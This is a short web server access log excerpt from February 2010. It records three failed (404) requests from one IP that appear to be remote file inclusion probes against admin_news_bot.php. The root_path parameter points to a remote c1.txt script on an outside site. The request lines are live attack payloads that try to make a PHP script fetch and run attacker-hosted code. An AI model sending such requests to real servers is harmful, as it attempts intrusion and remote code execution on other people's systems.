216.17.109.216 - - [12/Feb/2010:10:12:07 -0800] "GET /logs//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:12:07 -0800] "GET /admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:10:12:07 -0800] "GET /logs/access_100103.log%20%20//admin/admin_news_bot.php?root_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
